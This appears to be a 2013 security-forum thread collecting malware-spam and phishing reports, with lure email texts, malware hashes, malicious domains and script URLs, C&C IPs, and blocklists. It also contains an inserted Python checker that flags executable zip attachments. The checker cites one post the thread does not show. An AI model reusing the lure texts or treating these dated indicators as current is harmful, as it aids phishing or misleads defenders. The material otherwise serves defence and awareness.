* https://www.virustotal.com/en-gb/ip-address/64.50.166.122/information/

** http://urlquery.net/search.php?q=64.50.166.122&type=string&start=2013-10-09&end=2013-10-24&max=50

- http://threattrack.tumblr.com/post/64955364250/linkedin-resume-spam
Oct 24, 2013 - "Subjects Seen:
My resume
Typical e-mail details:
Attached is my resume, let me know if its ok.
Thanks,
Mike Whalen

Malicious File Name and MD5:
Resume_LinkedIn.zip (AF04ED38D97867F8E773B6AFC14ED9F0)
Resume_LinkedIn.exe
(62F4A3DFE059E9030E2450D608C82899)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/241debf2f886a3945d47d6bc1e3e3347/tumblr_inline_mv6facqrta1r6pupn.png
___

Fake Company Reports emails lead to malware ...
- http://www.webroot.com/blog/2013/10/24/fake-important-company-reports-themed-emails-lead-malware/
Oct 24, 2013 - "A currently ongoing malicious spam campaign is attempting to trick users into thinking that they’ve received a legitimate Excel ‘Company Reports’ themed file. In reality though, once socially engineered users execute the malicious attachment on their PCs, it automatically opens a backdoor allowing the cybercriminals behind the campaign to gain complete access to their host, potentially abusing it in a variety of fraudulent ways.
Sample screenshots of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Fake_Malicious_Rogue_Email_Spam_Spamvertised_Malware_Malicious_Software_Social_Engineering_Botnet_Company_Reports.png
Detection rate for the spamvertised attachment: MD5: 5138b3b410a1da4cbc3fcc2d9c223584 * ... Trojan.Win32.Agent.aclil; TSPY_ZBOT.EH ... The sample then phones back to det0nator.com – 38.102.226.14 on port 443, as well as to... C&C servers (-many- listed at the webroot URL above)... MD5s are known to have phoned back to the same IP (38.102.226.14)... MD5s known to have phoned back to the same C&C servers over the last couple of days..."
* https://www.virustotal.com/en/file/7ae17affe0c3c2bf997405e96e7cc2d42363bc7e945633cdc2be9d0cd169360f/analysis/
File name: Company_Report_10222013.exe
Detection ratio: 28/44

- https://www.virustotal.com/en/ip-address/38.102.226.14/information/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Faxed Document Delivery Email Messages - 2013 Oct 24
Fake Payroll Report Email Messages - 2013 Oct 24
Email Messages with Malicious Attachments - 2013 Oct 24
Fake UPS Payment Document Attachment Email Messages - 2013 Oct 24
Fake Financial Account Statement Email Messages - 2013 Oct 24
Email Messages with Malicious Attachments - 2013 Oct 24
Fake Bank Payment Transfer Notification Email Messages - 2013 Oct 24
Fake Invoice Statement Attachment Email Messages - 2013 Oct 24
Fake Payroll Invoice Notification Email Messages - 2013 Oct 24
Fake Product Purchase Order Email Messages - 2013 Oct 24
Fake Payment Confirmation Notification Email Messages - 2013 Oct 24
Malicious Personal Pictures Attachment Email Messages - 2013 Oct 24
Fake Resume Delivery Email Messages - 2013 Oct 24
Email Messages with Malicious Attachments - 2013 Oct 24
Fake Product Quote Request Email Messages - 2013 Oct 24
Email Messages with Malicious Attachments - 2013 Oct 24
Fake Money Transfer Notification Email Messages - 2013 Oct 23
Fake Xerox Scanned Attachment Email Messages - 2013 Oct 23
(More detail and links at the cisco URL above.)

:mad: :fear:

AplusWebMaster
2013-10-25, 14:06
FYI...

Survey Scams - Halloween freebies ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/halloween-freebies-lead-to-ghastly-survey-scams/
Oct 24, 2013 - "... scams we saw used free Halloween products as bait. Searching for the phrase “Halloween GET FREE” leads to a suspicious YouTube video:
Suspicious YouTube video
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-youtube1.jpg
The URL advertised on the video’s page leads users to a scam site that asks for your personal information, including your email address.
Survey site
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-youtube2.jpg
Survey scam
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-youtube3.jpg
Using similar keywords on Twitter yielded two suspicious accounts. Each account had a Halloween-themed Twitter handle, perhaps to entice users into checking out the accounts.
Two suspicious Twitter accounts
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-twitter11.jpg
Each account advertises free Halloween candy with a corresponding URL to get the said candy. The advertised website leads users to survey scams, rather than candy. Facebook also became home to a Halloween-themed survey scam. We spotted a Facebook page that advertises free Halloween candy, like the scam on Twitter. To get the candy, users are supposed to click a link on the page.
Website advertising free candy
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-facebook1.jpg
But much like the other scams, this simply leads to a survey site. It’s interesting to note that users are directed to the page used in the YouTube scam mentioned earlier. To further entice users, the site promises Apple products in exchange for finishing the survey.
Apple products as “reward” for completed surveys
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-facebook3.jpg
It might be tempting to get free stuff online, but users should always be cautious when encountering these types of promos or deals. Cybercriminals are willing to promise anything and everything just to get what they want. When encountering deals that are too good to be true, users should err on the side of caution and assume that they are..."
* http://blog.trendmicro.com/trendlabs-security-intelligence/tricks-and-threats-infographic/
"... Oct 29, 2011... filed under Bad Sites"
___

Fake Lloyds SPAM - Lloyds TSB msg...
- http://blog.dynamoo.com/2013/10/you-have-received-new-debit-lloyds-tsb.html
25 Oct 2013 - "This fake Lloyds TSB message has a malicious attachment:
Date: Fri, 25 Oct 2013 13:55:41 +0200 [07:55:41 EDT]
From: LloydsTSB [noreply@ lloydstsb .co .uk]
Subject: You have received a new debit
Priority: High Priority 1 (High)
This is an automatically generated email by the Lloyds TSB PLC LloydsLink online payments Service.
The details of the payment are attached...

Attached is a zip file in the format Report_recipientname.zip which in turn contains a malicious executable Report_10252013.exe (note the date is encoded into the filename). The file has an icon to make it look like a PDF file, but it isn't. The VirusTotal detection rate is a so-so 13/47*. Automated analysis... shows an attempted connection to www .baufie .com on 173.203.199.241 (Rackspace, US). Often these callbacks indicate a completely compromised server, so it may be possible that there are other sites being abused on the same box."
* https://www.virustotal.com/en-gb/file/27dd3808d50bc690e155b2687fe0e67083882f1d9493437343e27255ccd95ad4/analysis/1382702941/

- https://www.virustotal.com/en/ip-address/173.203.199.241/information/

:mad: :fear::fear:

AplusWebMaster
2013-10-28, 01:55
FYI...

Fake "You're a Mercedes-Benz winner!" SPAM
- http://blog.dynamoo.com/2013/10/you-are-mercedes-benz-winner-spam.html
27 Oct 2013 - "This is a slightly novel twist on an advanced fee fraud scam:
From: Mercedes-Benz [desk_notification@ yahoo .com]
Reply-To: bmlot20137@ live .com
Date: 27 October 2013 13:44
Subject: You are a Mercedes-Benz winner !!!
Dear Recipient,
You have received a loyalty reward from Mercedes-Benz, Answer the Below question correctly and stand a chance of winning our Promotional Award Grand prize of $4,000,000USD and a Brand New 2013 Mercedes-Benz GLK350 4Matic SUV Car. If you have never had a Mercedes-Benz Product, this is your chance to benefit from our company while if you have any of our products this is your opportunity of enjoying some of our benefits apart from the comfortability and efficiency of our products. Just answer the questions asked below and you could be a winner...
Our aims to support the abilities of the neediest groups to fulfill human dignity and social justice in cooperation with development partners in the world.
Kind Regards,
Mrs.Katherine Dooley
Mercedes-Benz,Online coordinator

The email was sent to a spamtrap address from 41.138.182.219 which is in Lagos, Nigeria via a mail server in the US at 65.40.236.192 (Embarq). You might wonder what the scam is because it looks like a competition.. once you have answered the three trivially easy questions (we all know that Mercedes Benz was founded by Terry Benz in 1946 and is headquartered in the UK, after all) then you will find that you'll need to pay a stiff fee to get your prize.. which will never materialise."
Labels: 419, Advanced Fee Fraud, Scam, Spam

:fear: :mad:

AplusWebMaster
2013-10-28, 13:01
FYI...

Fake WhatsApp Voice msg. emails lead to malware
- http://www.webroot.com/blog/2013/10/28/fake-whatsapp-voice-message-notification1-new-voicemail-themed-emails-lead-malware-2/
Oct 28, 2013 - "... The cybercriminal(s) behind the most recently profiled campaigns impersonating T-Mobile, and Sky, have just launched yet another malicious spam campaign, this time targeting WhatsApp users with fake “Voice Message Notification/1 New Voicemail” themed emails. Once unsuspecting users execute the fake voice mail attachment, their PCs will attempt to drop additional malware on the hosts...
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/WhatsApp_Email_Spam_Malware_Malicious_Software_Social_Engineering_Cybercrime.png
Detection rate for the malicious attachment: MD5: 0458a01e42544eacf00e6f2b39b788e0 * ... Trojan.Win32.Sharik.qhd
... attempts to download additional malware from the well known C&C server at networksecurityx.hopto .org ..."
* https://www.virustotal.com/en/file/ad4b4fc2cf32922405fe7cd8eb252aa22607004b5c70ac5c8109ef314ad36964/analysis/
___

Fake AMEX "Fraud Alert" SPAM / steelhorsecomputers .net
- http://blog.dynamoo.com/2013/10/american-express-fraud-alert-spam.html
28 Oct 2013 - "This fake Amex spam leads to malware on steelhorsecomputers .net:
From: American Express [fraud@ aexp .com]
Date: 28 October 2013 14:14
Subject: Fraud Alert : Irregular Card Activity
Irregular Card Activity
Dear Customer,
We detected irregular card activity on your American Express
Check Card on 28th October, 2013.
As the Primary Contact, you must verify your account activity before you can
continue using your card, and upon verification, we will remove any restrictions
placed on your account.
To review your account as soon as possible please.
Please click on the link below to verify your information with us:
https ://www .americanexpress .com/
If you account information is not updated within 24 hours then your ability
to access your account will be restricted.
We appreciate your prompt attention to this important matter.
© 2013 American Express Company. All rights reserved.
AMEX Fraud Department

Screenshot: https://lh3.ggpht.com/-NyKdfJqQV8A/Um6McGvcPyI/AAAAAAAACLU/volqQqZZQw8/s1600/amex.png

The link in the email goes through a legitimate but -hacked- site and then runs one of the following three scripts:
[donotclick]kaindustries .comcastbiz .net/imaginable/emulsion.js
[donotclick]naturesfinest .eu/eroding/patricians.js
[donotclick]winklersmagicwarehouse .com/handmade/analects.js
From there, the victim is sent to a malware landing page at [donotclick]steelhorsecomputers .net/americanexpress/ which is a hijacked GoDaddy domain hosted on 96.126.102.8 (Linode, US). There are other hijacked GoDaddy domains too...
Recommended blocklist:
96.126.102.8
8353333 .com ..."

- https://www.virustotal.com/en/ip-address/96.126.102.8/information/
___

Past Due Invoice Spam
- http://threattrack.tumblr.com/post/65351182223/past-due-invoice-spam
Oct 28, 2013 - "Subjects Seen:
Past Due Invoice
Typical e-mail details:
Your invoice is attached. Please remit payment at your earliest convenience.

Malicious File Name and MD5:
invoice_95836_10282013.zip (7CDBF5827161838D7C5BD0E5B98E01C1)
invoice_95836_10282013.exe (C277EA5A86F25AC0B704CAF5832FC614)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ac231f1d8cd70361a9f185642dd14d83/tumblr_inline_mve559X8gD1r6pupn.png

:mad: :fear:

AplusWebMaster
2013-10-29, 19:02
FYI...

Fake Wells Fargo SPAM / Copy_10292013.zip
- http://blog.dynamoo.com/2013/10/wells-fargo-check-copy-spam.html
29 Oct 2013 - "These fake Wells Fargo spam messages have a malicious attachment:
Date: Tue, 29 Oct 2013 22:34:50 +0800 [10:34:50 EDT]
From: Wells Fargo [Emilio.Hendrix@ wellsfargo .com]
Subject: FW: Check copy
We had problems processing your latest check, attached is a image copy.
Emilio Hendrix
Wells Fargo Check Processing Services
817-576-4067 office
817-192-2390 cell Emilio.Hendrix@ wellsfargo .com
Wells Fargo Check Processing Services. 1 North Jefferson, St. Louis, MO 63103...
--------------------
Date: Tue, 29 Oct 2013 14:41:46 +0000 [10:41:46 EDT]
From: Wells Fargo [Leroy.Dale@ wellsfargo .com]
Subject: FW: Check copy
We had problems processing your latest check, attached is a image copy.
Leroy Dale
Wells Fargo Check Processing Services
817-480-3826 office
817-710-4624 cell Leroy.Dale@ wellsfargo .com
Wells Fargo Check Processing Services. 1 North Jefferson, St. Louis, MO 63103...

Attached is an executable file Copy_10292013.zip which contains an executable file Copy_10292013.exe which is (of course) malicious. Note that the date is encoded into the filenames, so future versions of this will vary. The VirusTotal detection rate is just 3/47*. Automated analysis... shows an attempted connection to allisontravels .com on 69.26.171.181 (Xeex Communications, US) which appears to be the only site currently on this server. I would recommend blocking one or both of these."
* https://www.virustotal.com/en-gb/file/f6a99470d5cddbec1efa7457cce598db675557f298bae2929149fa2aa3cbe8aa/analysis/1383058267/

- http://threattrack.tumblr.com/post/65435227304/wells-fargo-check-copy-spam
Oct 29, 2013 - "Subjects Seen:
FW: Check copy
Typical e-mail details:
We had problems processing your latest check, attached is a image copy...

Malicious File Name and MD5:
Copy_10292013.zip (E0D3B0A7BCCDD0AA79A1F81C79A83784)
Copy_10292013.exe (93CCC1B516EFC3365CECED8AE0B57EE2)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/60378ab4d687528636cb0339a170c768/tumblr_inline_mvfr56kFaj1r6pupn.png
___

Something evil on 82.211.31.147
- http://blog.dynamoo.com/2013/10/something-evil-on-8221131147.html
29 Oct 2013 - "Still investigating this one, but 82.211.31.147 (IP-Projects, Germany) appears to be a completely rogue server hosting exploit kits and malware [1] [2]... domains and subdomains are associated with this IP address. I recommend blocking them, or more easily the IP address itself."
(Long list at the dynamoo URL above.)
1) http://urlquery.net/search.php?q=82.211.31.147&type=string&start=2013-10-14&end=2013-10-29&max=50

2) https://www.virustotal.com/en-gb/ip-address/82.211.31.147/information/
___

CookieBomb toolkit ...
- http://community.websense.com/blogs/securitylabs/archive/2013/10/29/evolution-of-the-cookiebomb-toolkit.aspx
Oct 29, 2013 - "... source of this message is a spambot or script. When looked over with an experienced eye, it becomes apparent this email may just have come from the Kelihos botnet...
46.180.44.231
46.185.22.123
109.162.98.248
Malware evolution is not new: indeed, since the days of Dark Avenger’s polymorphic engine, the Mutation Engine (MtE), obfuscation and evasion have been commonplace within most, if not all malware families... in as little as 6 months, a simple tool for delivering Exploit Kits to end users has not only had its code radically altered, but has split into two distinct campaigns. One campaign is as mentioned above, infecting legitimate hosts via the exploitation of vulnerabilities; the other... piggybacking on the Kelihos Botnet, which is an incredibly sophisticated and effective spam platform, as a means of exposing end users to EKs via blatantly malicious domains. Whether this tool was exclusively rented by/to the BHEK team, or whether in fact it was coded by them, remains to be seen."
- https://www.virustotal.com/en/ip-address/46.180.44.231/information/

- https://www.virustotal.com/en/ip-address/109.162.98.248/information/
___

Suspect network: 69.26.171.176/28
- http://blog.dynamoo.com/2013/10/suspect-network-692617117628.html
29 Oct 2013 - "69.26.171.176/28 is a small network range suballocated from Xeex to the following person or company, which appears to have been compromised.
%rwhois V-1.5:0000a0:00 rwhois.xeex .com (by Network Connection Canada. V-1.0)
network:auth-area:69.26.160.0/19
network:network-name:69.26.171.176
network:ip-network:69.26.171.176/28
network:org-name:MJB Capital, Inc.
network:street-address:8275 South Eastern Avenue
network:city:Las Vegas
network:state:NV
network:postal-code:89123
network:country-code:US
network:tech-contact:Mark Bunnell
network:updated:2013-05-30 10:01:58
network:updated-by:noc@ xeex .com
network:class-name:network

There are three very recent Malwr reports involving sites in this range:
69.26.171.179 - bookmarkingbeast .com
- https://malwr.com/analysis/MDMwMGY2ZWU0YTAxNGI3ZWI4NmNlNjAyYmFjMWRhMTU/
69.26.171.181 - allisontravels .com
- https://malwr.com/analysis/ZWE1NDQ0MTI3OTU2NDZjM2I1YWEyYWJhNDNlZjVjMzA/
69.26.171.182 - robotvacuumhut .com
- https://malwr.com/analysis/MDVlNjJkNDhjYzYyNDc0NDliZTZmNDY5ODRiNWVhM2I/
As a precaution, I would recommend temporarily blocking the whole range... other sites are also hosted in the same block, and if you are seeing unusual traffic going to them then I would suspect that it is a malware infection..."
(More domains listed at the dynamoo URL above.)

:mad: :fear::sad:

AplusWebMaster
2013-10-30, 19:52
FYI...

Fake eFax message SPAM / bulkbacklinks .com and Xeex .com
- http://blog.dynamoo.com/2013/10/corporate-efax-message-spam.html
30 Oct 2013 - "... do people really fall for this "Corporate eFax message" spam? Apparently people do because the spammers keep sending it out.
Date: Wed, 30 Oct 2013 23:33:23 +0900 [10:33:23 EDT]
From: eFax Corporate [message@ inbound . efax.com]
Subject: Corporate eFax message from "673-776-6455" - 2 pages
Fax Message [Caller-ID: 673-776-6455] You have received a 2 pages fax at 2013-30-10
02:22:22 CST.* The reference number for this fax is
latf1_did11-1995781774-8924188505-39.View this fax using your PDF reader.Please visit
www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or
your service.Thank you for using the eFax service..
-----------------------
Date: Wed, 30 Oct 2013 10:04:50 -0500 [11:04:50 EDT]
From: eFax Corporate [message@ inbound .efax.com]
Subject: Corporate eFax message from "877-579-4466" - 5 pages
Fax Message [Caller-ID: 877-579-4466] You have received a 5 pages fax at 2013-30-10
05:55:55 EST.* The reference number for this fax is
latf1_did11-1224528296-8910171724-72.View this fax using your PDF reader.Please visit
www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or
your service.Thank you for using the eFax service...

Attached to the message is a file FAX_10302013_1013.zip which in turn contains FAX_10302013_1013.exe (although the date is encoded into the filename so your version may be different) which has an icon that makes it look like a PDF file. This has a very low detection rate at VirusTotal of just 1/46*. Automated analysis tools... show an attempted connection to a domain bulkbacklinks .com on 69.26.171.187. This is part of the same compromised Xeex address range... Xeex have not responded to notifications of a problem (apart from an AutoNACK). I recommend that you treat the entire 69.26.171.176/28 range as being malicious and you should block according to this list**."
* https://www.virustotal.com/en-gb/file/d50c068a3e2ea94e93ee282a8d13f26218cecf75d6f7929567e5882f24a77df4/analysis/1383148137/

** http://blog.dynamoo.com/2013/10/suspect-network-692617117628.html
___

Something evil on 144.76.207.224/28
- http://blog.dynamoo.com/2013/10/something-evil-on-1447620722428.html
30 Oct 2013 - "The network block 144.76.207.224/28 is currently hosting the Magnitude exploit kit (example report*)... This is a Hetzner IP range... Domains hosted on this range include the following, ones in bold are flagged by Google as being malicious (Long list - see the dynamoo URL above)... I would recommend blocking all those domains plus the 144.76.207.224/28 range. Sphere Ltd seem to have some quite big operations in Russia. For information only, these are the other IP address ranges (Also listed at the dynamoo URL above)..."
* http://urlquery.net/report.php?id=7281185

:mad: :fear::fear:
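Several of the posts above (Lloyds Report_10252013.exe, Wells Fargo Copy_10292013.exe, eFax FAX_10302013_1013.exe, ADP invoice_<random>.pdf.exe) describe the same lure: a zip attachment holding one executable whose name carries the day's date and whose icon or double extension mimics a document. The checker below is an added example for mail-gateway triage of that pattern; it is not code from any of the quoted blogs, and the archives it inspects are constructed in memory, not the real samples.

```python
"""Inspect a mail attachment zip for the date-stamped executable lure pattern.

Added example; the sample archives are constructed here and are not real malware.
"""
from __future__ import annotations

import io
import re
import zipfile
from dataclasses import dataclass, field
from datetime import datetime

EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".wav", ".mp3"}
# An 8-digit run not glued to other digits, e.g. 10302013 in FAX_10302013_1013.exe
DATE_RE = re.compile(r"(?<!\d)(\d{8})(?!\d)")


@dataclass
class Finding:
    member: str
    executable: bool = False   # last extension is in EXEC_EXTS
    pe_magic: bool = False     # content starts with "MZ", whatever the name says
    double_ext: bool = False   # document extension followed by an executable one
    dates: list[str] = field(default_factory=list)  # MMDDYYYY stamps in the name


def extract_dates(name: str) -> list[str]:
    """Return the 8-digit runs in a filename that parse as MMDDYYYY dates."""
    found = []
    for token in DATE_RE.findall(name):
        try:
            datetime.strptime(token, "%m%d%Y")
        except ValueError:
            continue  # e.g. 13452013: not a date, just a number
        found.append(token)
    return found


def split_exts(name: str) -> list[str]:
    """'dir/invoice_x.PDF.exe' -> ['.pdf', '.exe'] (basename only, lower-cased)."""
    base = name.rsplit("/", 1)[-1]
    return ["." + p for p in base.lower().split(".")[1:]]


def inspect_zip(data: bytes) -> list[Finding]:
    """Flag every member that is executable by name or content, or carries a date stamp."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            exts = split_exts(info.filename)
            f = Finding(info.filename)
            f.executable = bool(exts) and exts[-1] in EXEC_EXTS
            f.double_ext = len(exts) >= 2 and exts[-2] in DOC_EXTS and exts[-1] in EXEC_EXTS
            f.dates = extract_dates(info.filename)
            with zf.open(info) as fh:
                f.pe_magic = fh.read(2) == b"MZ"  # PE/DOS header, ignores the extension
            if f.executable or f.pe_magic or f.double_ext or f.dates:
                findings.append(f)
    return findings


def should_block(findings: list[Finding]) -> bool:
    """Block on any executable member; a date stamp alone is not enough, since real
    scanners and accounting systems also name files by date."""
    return any(f.executable or f.pe_magic for f in findings)


def matches_date_stamped_lure(findings: list[Finding]) -> bool:
    """The specific fingerprint from the posts: an executable named with a date stamp."""
    return any(f.executable and f.dates for f in findings)


def build_sample(members: dict[str, bytes]) -> bytes:
    """Build an in-memory zip (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed stand-ins: a fake MZ header is enough to exercise the content check.
SAMPLES = {
    "efax_lure": build_sample({"FAX_10302013_1013.exe": b"MZ" + b"\x00" * 62}),
    "double_ext": build_sample({"invoice_95836.pdf.exe": b"MZ" + b"\x00" * 62}),
    "renamed_exe": build_sample({"statement.pdf": b"MZ" + b"\x00" * 62}),
    "benign_scan": build_sample({"Report_10252013.pdf": b"%PDF-1.4\n%%EOF\n"}),
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        found = inspect_zip(blob)
        print(label, "BLOCK" if should_block(found) else "allow",
              "(date-stamped lure)" if matches_date_stamped_lure(found) else "", found)
```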

AplusWebMaster
2013-10-31, 16:14
FYI...

Rogue Ads in Yahoo lead to Sirefef Infection
- http://www.threattracksecurity.com/it-blog/rogue-ads-yahoo-lead-sirefef-infection/
Oct 30, 2013 - "Our researchers in the AV Labs are continuing to see fake software being served on unfamiliar sponsored links or ads found in search results. Recently, we found an ad for a fake browser on Yahoo! after doing a search for “google chrome browser”.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/yahoo-search-ad.png
Clicking the first ad we highlighted above leads users to the website, softpack(dot)info/chrome/:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/fake-chrome-page.png
Below this page are texts that read as follows:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/lower-section-wm.png
... In case you’re not familiar, rogue sites like this usually serve free-to-download software that are modified to install adware. In this case, Google_Chrome_30.0.1599.69.exe, the -fake- browser file, is wholly malicious and belongs to the Sirefef/ZeroAccess malware family. We were able to retrieve two variants of this file...
MD5 9111ebfbf015c3096f650060819f744b – detected as Trojan.Win32.Generic!SB.0 (15/47*)
MD5 60a0e64fec6b5e509b666902e72833ea – detected as Trojan.Win32.Generic.pak!cobra (7/47**)
... We fed the files into our sandbox and found that -both- variants -disable- Windows security features and prevent the OS from updating automatically. Infected systems, especially those that run outdated software and have no added security software in place, face the risk of further infection from other malware. Users are advised to be careful in clicking ads for free software. It is still safer for you... to visit -official- pages of the software you wish to download and install onto your system. You may also consider installing AdBlock Plus***, a software that can be installed in the browser to prevent ads from appearing on sites while you surf..."
* https://www.virustotal.com/en/file/fd5cdc89d535857bfab3facdded568dbf229527298bcc981c595958fa1755c02/analysis/1383072130/

** https://www.virustotal.com/en/file/cd42a909b54651dd77b655b6dd170105138b8f47c9f7be4118476312c030ffbd/analysis/

*** https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/

:mad: :fear::fear:

AplusWebMaster
2013-11-01, 12:50
FYI...

Fake Snapchat install leads to Adware
- http://www.threattracksecurity.com/it-blog/fake-snapchat-install-leads-adware/
Nov 1, 2013 - "Our Labs recently identified numerous files claiming to be Snapchat.exe, which is a popular photo messaging application. These files were most assuredly not Snapchat, so we were curious to find out what was going on. As it turns out, a quick search in Bing brings forth answers:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/snapchat-optimum-ad.png
The very first entry under the search is an ad, leading to videonechat(dot)com.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/snapchatdorgem.jpg
The website simultaneously talks about installing Snapchat, while listing the program as “Dorgem” in small letters in the grey box on the top right hand side. At this point, you might want to take a wild guess as to whether you’re going to end up with Snapchat, a hugely popular and current application, or a now discontinued webcam capture program called -Dorgem- which has been bundled with programs you likely don’t need... The install offers up a number of ad serving programs, media players and additional software offered up with no relation to Snapchat whatsoever. During testing, we saw Realplayer, GreatArcadeHits, Optimizer Pro, Scorpion Saver and Word Overview...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/adknowledge-snap-7.png
Legitimate programs being bundled with Adware is a common enough tactic, but this is an Optimum Installer bundle where a website serves as clickbait for a deliberately misrepresented app – you most definitely do not get what you’re promised in return for installing numerous pieces of ad-serving software. Don’t fall for this one. VirusTotal pegs this one at 6/47*..."
* https://www.virustotal.com/en/file/310c015702cf679740dcc1bb10250f8f13f63322de944ce42d84e0d30f51433a/analysis/1383232536/
___

Email Quota Limit Credentials Phish
- http://threattrack.tumblr.com/post/65699040166/email-quota-limit-credentials-phish
Nov 1, 2013 - "Subjects Seen:
Email Quota Limit
Typical e-mail details:
Your mailbox has exceeded the storage limit, you may not be able to send or receive new mail until you re-validate your mailbox mail with the link below.
System Administrator

Malicious URLs
suppereasy.jimdo .com

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/eb3e9ebbb3d6d5a3dceb6decc215f8d4/tumblr_inline_mvldpyDIa01r6pupn.png

:mad: :fear:

AplusWebMaster
2013-11-02, 18:24
FYI...

Ads lead to SpyAlertApp PUA ...
- http://www.webroot.com/blog/2013/11/01/deceptive-ads-lead-spyalertapp-pua-potentially-unwanted-application/
Nov 1, 2013 - "... They promise users the moon, and only ask in return that users install a basic free application. Case in point, our sensors picked up yet another deceptive ad campaign that entices users into installing privacy violating applications, most commonly known as PUAs...
Sample screenshots of the landing page:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/SpyAlertApp_Search_Donkey_PUA_Potentially_Unwanted_Application-896x1024.png
Landing URL: spyalertapp .com
Detection rate for the SpyAlertApp PUA: MD5: 183cf05e8846a18dab9850ce696c3bf3 * ... Win32/ExFriendAlert.B; SearchDonkey (fs)
Once executed, it phones back to 66.135.34.182 and 66.135.34.181 ... PUA MD5s are known to have phoned back to these IPs... Want to know who’s tracking your online activities? We advise you to give Mozilla’s Lightbeam** a try."
* https://www.virustotal.com/en/file/555f41fef52b8749af0d9c8800a42d4527060ece923eb08bb5a53befe44649ab/analysis/1382979505/

** http://www.mozilla.org/en-US/lightbeam/

- https://www.virustotal.com/en/ip-address/66.135.34.181/information/

- https://www.virustotal.com/en/ip-address/66.135.34.182/information/

:mad: :fear:

AplusWebMaster
2013-11-04, 21:14
FYI...

Fake SAGE SPAM / Payroll_Report-PaymentOverdue.exe
- http://blog.dynamoo.com/2013/11/payment-overdue-please-respond-spam.html
4 Nov 2013 - "This -fake- SAGE spam has a malicious attachment:
Date: Mon, 4 Nov 2013 21:00:59 +0600 [10:00:59 EST]
From: Payroll Reports [payroll@sage .co .uk]
Please find attached payroll reports for the past months. Remit the new payment by 11/10/2013 as outlines under our payment agreement.
Sincerely,
Bernice Swanson
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY...

Attached is a file PaymentOverdue.zip which in turn contains a malicious executable Payroll_Report-PaymentOverdue.exe with an icon that makes it look like an Excel spreadsheet. This malware has a VirusTotal detection rate of just 4/47*, and automated analysis tools... shows an attempted connect to goyhenetche .com on 184.154.15.188 (Singlehop, US), a server that contains many legitimate domains but some more questionable ones** too."
* https://www.virustotal.com/en-gb/file/9dfa58c9ec7e5978706cbba73dfbbd9828aa7caf67274688c315b0a64b97d815/analysis/1383579237/

** https://www.virustotal.com/en-gb/ip-address/184.154.15.188/information/

Diagnostic page for AS32475 (SINGLEHOP-INC)
- http://google.com/safebrowsing/diagnostic?site=AS:32475
"... over the past 90 days, 1069 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-11-04, and the last time suspicious content was found was on 2013-11-04... we found 73 site(s) on this network... that appeared to function as intermediaries for the infection of 371 other site(s)... We found 147 site(s)... that infected 543 other site(s)..."

- http://threattrack.tumblr.com/post/66000322286/sage-payroll-overdue-payment-spam
Nov 4, 2013 - "Subjects Seen:
Payment Overdue - Please respond
Typical e-mail details:
Please find attached payroll reports for the past months. Remit the new payment by 11/10/2013 as outlines under our payment agreement.
Sincerely,
Shelby Lloyd

Malicious File Name and MD5:
PaymentOverdue.zip (AF69AE41F500EBCE3A044A1FC8FF8701)
Payroll_Report-PaymentOverdue.exe (32B2481F9EF7F58D3EF3640ECFC64B19)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/35a3c83b4732e7e1e4b26248d702e85c/tumblr_inline_mvqx1rPlId1r6pupn.png
___

Ring Central Fax Spam
- http://threattrack.tumblr.com/post/66001198347/ring-central-fax-spam
Nov 4, 2013 - "Subjects Seen:
New Fax Message on 11/04/2013
Typical e-mail details:
To view this message, please open the attachment
Thank you for using RingCentral.

Malicious File Name and MD5:
<random #s>.pdf.exe (FE52EE7811D93A3E941C0A15126152AC)
<random #s>.zip (8728BBFD1ABAC087211D55BB53991017)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1d1bf6b80679780a97c58e296d1f19a0/tumblr_inline_mvqxpmLMDn1r6pupn.png

:fear::fear: :mad:

AplusWebMaster
2013-11-05, 19:14
FYI...

Fake ACH SPAM / ACAS1104201336289204PARA7747.zip
- http://blog.dynamoo.com/2013/11/ach-notification-ach-process-end-of-day.html
5 Nov 2013 - "This fake ACH (or is it Paychex?) email has a malicious attachment:
Date: Tue, 5 Nov 2013 08:28:30 -0500 [08:28:30 EST]
From: "Paychex, Inc" [paychexemail@ paychex .com]
Subject: ACH Notification : ACH Process End of Day Report
Attached is a summary of Origination activity for 11/04/2013 If you need assistance
